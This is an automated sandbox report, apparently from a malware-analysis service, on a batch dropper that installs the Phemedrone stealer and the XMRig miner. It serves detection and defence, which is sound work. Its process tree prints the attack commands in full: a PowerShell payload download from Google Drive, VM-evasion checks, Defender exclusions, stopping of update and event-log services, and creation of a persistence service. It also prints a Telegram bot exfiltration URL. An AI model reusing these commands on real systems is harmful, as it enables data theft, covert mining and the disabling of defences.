phemedrone | c1246db99e2391de3ab074eee3815e638e8546b626103281948c560002970e6d

Analysis

max time kernel
1199s
max time network
1194s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
06-06-2024 12:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

start.bat
Size

100KB
MD5

45ccb4e03696834d0852bb90f65e3629
SHA1

0d67056066728699a323f63510cdadefc9504084
SHA256

7e0903c4f236d2e0e92522ede6284ea24464af4e86c812cce72e897bb2a87754
SHA512

0c30ab9c768d378d29ad4fdc16d3321038dc71040d041deb8604751f950691aef8a2e6c817578db9057ffb0460f3b3b97f44488f884b2fd7b18f0bde9f2d4561
SSDEEP

3072:9AP7YD2E0xfyQZbsRdwNWuiTvEoryDJV9MTtnI3:9A8D2x66sRdwku+T4MTtI3

Score

10^/10

phemedrone xmrig evasion execution miner persistence spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download

Extracted

Family

phemedrone

https://api.telegram.org/bot7274515778:AAEx4SxiDLjUG8dht4Cac1HVmxqTSwD_yL4/sendDocument

Signatures

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 12 IoCs

miner

resource	yara_rule
behavioral2/memory/3292-585-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-590-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-589-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-591-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-588-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-587-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-584-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-595-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-596-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-597-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-598-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/3292-599-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	1952	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4572	powershell.exe
304	powershell.exe
4216	powershell.exe
1952	powershell.exe
1980	powershell.exe
1832	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	Run64.exe
File created	C:\Windows\system32\drivers\etc\hosts	regedit.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 3 IoCs

pid	Process
952	Java20.exe
3416	Run64.exe
1004	regedit.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3292-579-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-580-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-582-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-585-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-590-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-589-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-591-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-588-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-587-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-581-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-583-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-584-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-595-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-596-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-597-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-598-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/3292-599-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	pastebin.com
15	pastebin.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	Run64.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	regedit.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 952 set thread context of 4604	952	Java20.exe	93
PID 1004 set thread context of 1976	1004	regedit.exe	152
PID 1004 set thread context of 3292	1004	regedit.exe	155

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2220	sc.exe
4640	sc.exe
768	sc.exe
3612	sc.exe
2352	sc.exe
4932	sc.exe
4496	sc.exe
3656	sc.exe
3856	sc.exe
2404	sc.exe
2516	sc.exe
2328	sc.exe
2348	sc.exe
3012	sc.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
4292	timeout.exe
4220	timeout.exe
3936	timeout.exe

Modifies data under HKEY_USERS 51 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe

Runs regedit.exe 1 IoCs

pid	Process
1004	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
304	powershell.exe
304	powershell.exe
304	powershell.exe
4216	powershell.exe
4216	powershell.exe
4216	powershell.exe
1952	powershell.exe
1952	powershell.exe
1952	powershell.exe
4128	powershell.exe
4128	powershell.exe
4128	powershell.exe
4604	RegAsm.exe
3416	Run64.exe
1980	powershell.exe
1980	powershell.exe
1980	powershell.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
3416	Run64.exe
1004	regedit.exe
1832	powershell.exe
1832	powershell.exe
1832	powershell.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe
4604	RegAsm.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
624	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1408	WMIC.exe
Token: SeSecurityPrivilege	1408	WMIC.exe
Token: SeTakeOwnershipPrivilege	1408	WMIC.exe
Token: SeLoadDriverPrivilege	1408	WMIC.exe
Token: SeSystemProfilePrivilege	1408	WMIC.exe
Token: SeSystemtimePrivilege	1408	WMIC.exe
Token: SeProfSingleProcessPrivilege	1408	WMIC.exe
Token: SeIncBasePriorityPrivilege	1408	WMIC.exe
Token: SeCreatePagefilePrivilege	1408	WMIC.exe
Token: SeBackupPrivilege	1408	WMIC.exe
Token: SeRestorePrivilege	1408	WMIC.exe
Token: SeShutdownPrivilege	1408	WMIC.exe
Token: SeDebugPrivilege	1408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1408	WMIC.exe
Token: SeRemoteShutdownPrivilege	1408	WMIC.exe
Token: SeUndockPrivilege	1408	WMIC.exe
Token: SeManageVolumePrivilege	1408	WMIC.exe
Token: 33	1408	WMIC.exe
Token: 34	1408	WMIC.exe
Token: 35	1408	WMIC.exe
Token: 36	1408	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1408	WMIC.exe
Token: SeSecurityPrivilege	1408	WMIC.exe
Token: SeTakeOwnershipPrivilege	1408	WMIC.exe
Token: SeLoadDriverPrivilege	1408	WMIC.exe
Token: SeSystemProfilePrivilege	1408	WMIC.exe
Token: SeSystemtimePrivilege	1408	WMIC.exe
Token: SeProfSingleProcessPrivilege	1408	WMIC.exe
Token: SeIncBasePriorityPrivilege	1408	WMIC.exe
Token: SeCreatePagefilePrivilege	1408	WMIC.exe
Token: SeBackupPrivilege	1408	WMIC.exe
Token: SeRestorePrivilege	1408	WMIC.exe
Token: SeShutdownPrivilege	1408	WMIC.exe
Token: SeDebugPrivilege	1408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1408	WMIC.exe
Token: SeRemoteShutdownPrivilege	1408	WMIC.exe
Token: SeUndockPrivilege	1408	WMIC.exe
Token: SeManageVolumePrivilege	1408	WMIC.exe
Token: 33	1408	WMIC.exe
Token: 34	1408	WMIC.exe
Token: 35	1408	WMIC.exe
Token: 36	1408	WMIC.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	304	powershell.exe
Token: SeIncreaseQuotaPrivilege	304	powershell.exe
Token: SeSecurityPrivilege	304	powershell.exe
Token: SeTakeOwnershipPrivilege	304	powershell.exe
Token: SeLoadDriverPrivilege	304	powershell.exe
Token: SeSystemProfilePrivilege	304	powershell.exe
Token: SeSystemtimePrivilege	304	powershell.exe
Token: SeProfSingleProcessPrivilege	304	powershell.exe
Token: SeIncBasePriorityPrivilege	304	powershell.exe
Token: SeCreatePagefilePrivilege	304	powershell.exe
Token: SeBackupPrivilege	304	powershell.exe
Token: SeRestorePrivilege	304	powershell.exe
Token: SeShutdownPrivilege	304	powershell.exe
Token: SeDebugPrivilege	304	powershell.exe
Token: SeSystemEnvironmentPrivilege	304	powershell.exe
Token: SeRemoteShutdownPrivilege	304	powershell.exe
Token: SeUndockPrivilege	304	powershell.exe
Token: SeManageVolumePrivilege	304	powershell.exe
Token: 33	304	powershell.exe
Token: 34	304	powershell.exe
Token: 35	304	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5116 wrote to memory of 4124	5116	cmd.exe	72
PID 5116 wrote to memory of 4124	5116	cmd.exe	72
PID 5116 wrote to memory of 3660	5116	cmd.exe	73
PID 5116 wrote to memory of 3660	5116	cmd.exe	73
PID 5116 wrote to memory of 1240	5116	cmd.exe	74
PID 5116 wrote to memory of 1240	5116	cmd.exe	74
PID 5116 wrote to memory of 4072	5116	cmd.exe	75
PID 5116 wrote to memory of 4072	5116	cmd.exe	75
PID 4072 wrote to memory of 1408	4072	cmd.exe	76
PID 4072 wrote to memory of 1408	4072	cmd.exe	76
PID 5116 wrote to memory of 4312	5116	cmd.exe	78
PID 5116 wrote to memory of 4312	5116	cmd.exe	78
PID 5116 wrote to memory of 4572	5116	cmd.exe	79
PID 5116 wrote to memory of 4572	5116	cmd.exe	79
PID 5116 wrote to memory of 1916	5116	cmd.exe	80
PID 5116 wrote to memory of 1916	5116	cmd.exe	80
PID 5116 wrote to memory of 304	5116	cmd.exe	111
PID 5116 wrote to memory of 304	5116	cmd.exe	111
PID 5116 wrote to memory of 4216	5116	cmd.exe	82
PID 5116 wrote to memory of 4216	5116	cmd.exe	82
PID 5116 wrote to memory of 4988	5116	cmd.exe	83
PID 5116 wrote to memory of 4988	5116	cmd.exe	83
PID 5116 wrote to memory of 3112	5116	cmd.exe	84
PID 5116 wrote to memory of 3112	5116	cmd.exe	84
PID 5116 wrote to memory of 3936	5116	cmd.exe	85
PID 5116 wrote to memory of 3936	5116	cmd.exe	85
PID 5116 wrote to memory of 1720	5116	cmd.exe	86
PID 5116 wrote to memory of 1720	5116	cmd.exe	86
PID 5116 wrote to memory of 1952	5116	cmd.exe	87
PID 5116 wrote to memory of 1952	5116	cmd.exe	87
PID 5116 wrote to memory of 4128	5116	cmd.exe	88
PID 5116 wrote to memory of 4128	5116	cmd.exe	88
PID 5116 wrote to memory of 2248	5116	cmd.exe	89
PID 5116 wrote to memory of 2248	5116	cmd.exe	89
PID 5116 wrote to memory of 952	5116	cmd.exe	90
PID 5116 wrote to memory of 952	5116	cmd.exe	90
PID 5116 wrote to memory of 952	5116	cmd.exe	90
PID 5116 wrote to memory of 3416	5116	cmd.exe	91
PID 5116 wrote to memory of 3416	5116	cmd.exe	91
PID 5116 wrote to memory of 4292	5116	cmd.exe	92
PID 5116 wrote to memory of 4292	5116	cmd.exe	92
PID 952 wrote to memory of 4604	952	Java20.exe	93
PID 952 wrote to memory of 4604	952	Java20.exe	93
PID 952 wrote to memory of 4604	952	Java20.exe	93
PID 952 wrote to memory of 4604	952	Java20.exe	93
PID 952 wrote to memory of 4604	952	Java20.exe	93
PID 952 wrote to memory of 4604	952	Java20.exe	93
PID 952 wrote to memory of 4604	952	Java20.exe	93
PID 952 wrote to memory of 4604	952	Java20.exe	93
PID 5116 wrote to memory of 5036	5116	cmd.exe	94
PID 5116 wrote to memory of 5036	5116	cmd.exe	94
PID 5116 wrote to memory of 4220	5116	cmd.exe	95
PID 5116 wrote to memory of 4220	5116	cmd.exe	95
PID 2520 wrote to memory of 3428	2520	cmd.exe	103
PID 2520 wrote to memory of 3428	2520	cmd.exe	103
PID 3768 wrote to memory of 1636	3768	cmd.exe	141
PID 3768 wrote to memory of 1636	3768	cmd.exe	141
PID 1004 wrote to memory of 1976	1004	regedit.exe	152
PID 1004 wrote to memory of 1976	1004	regedit.exe	152
PID 1004 wrote to memory of 1976	1004	regedit.exe	152
PID 1004 wrote to memory of 1976	1004	regedit.exe	152
PID 1004 wrote to memory of 1976	1004	regedit.exe	152
PID 1004 wrote to memory of 1976	1004	regedit.exe	152
PID 1004 wrote to memory of 1976	1004	regedit.exe	152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\start.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5116
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\start.bat"
  2⤵
  PID:4124
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\start.bat"
  2⤵
  PID:3660
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\start.bat"
  2⤵
  PID:1240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1408
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\start.bat"
  2⤵
  PID:4312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:1916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4216
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:4988
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:3112
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:3936
- C:\Windows\system32\doskey.exe
  doskey /listsize=0
  2⤵
  PID:1720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "Write-Host -NoNewLine $null"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4128
- C:\Users\Admin\AppData\Local\Temp\rar\UnRAR.exe
  "C:\Users\Admin\AppData\Local\Temp\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
  2⤵
  PID:2248
- C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
  "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4604
- C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
  "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:3416
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2520
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3428
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2516
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2352
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4640
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:3612
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:2404
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:304
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:1556
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:592
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:1708
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:4996
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "Micro"
    3⤵
    - Launches sc.exe
    PID:3856
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "Micro" binpath= "C:\ProgramData\soft\regedit.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3656
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4932
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "Micro"
    3⤵
    - Launches sc.exe
    PID:2220
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:4292
- C:\Windows\system32\doskey.exe
  doskey ASSOC=ENDLOCAL
  2⤵
  PID:5036
- C:\Windows\system32\timeout.exe
  timeout /T 10 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:4220
- C:\Windows\system32\doskey.exe
  doskey /listsize=0
  2⤵
  PID:3720

C:\ProgramData\soft\regedit.exe
C:\ProgramData\soft\regedit.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Runs regedit.exe
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1004
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3768
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1636
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3012
- C:\Windows\system32\sc.exe
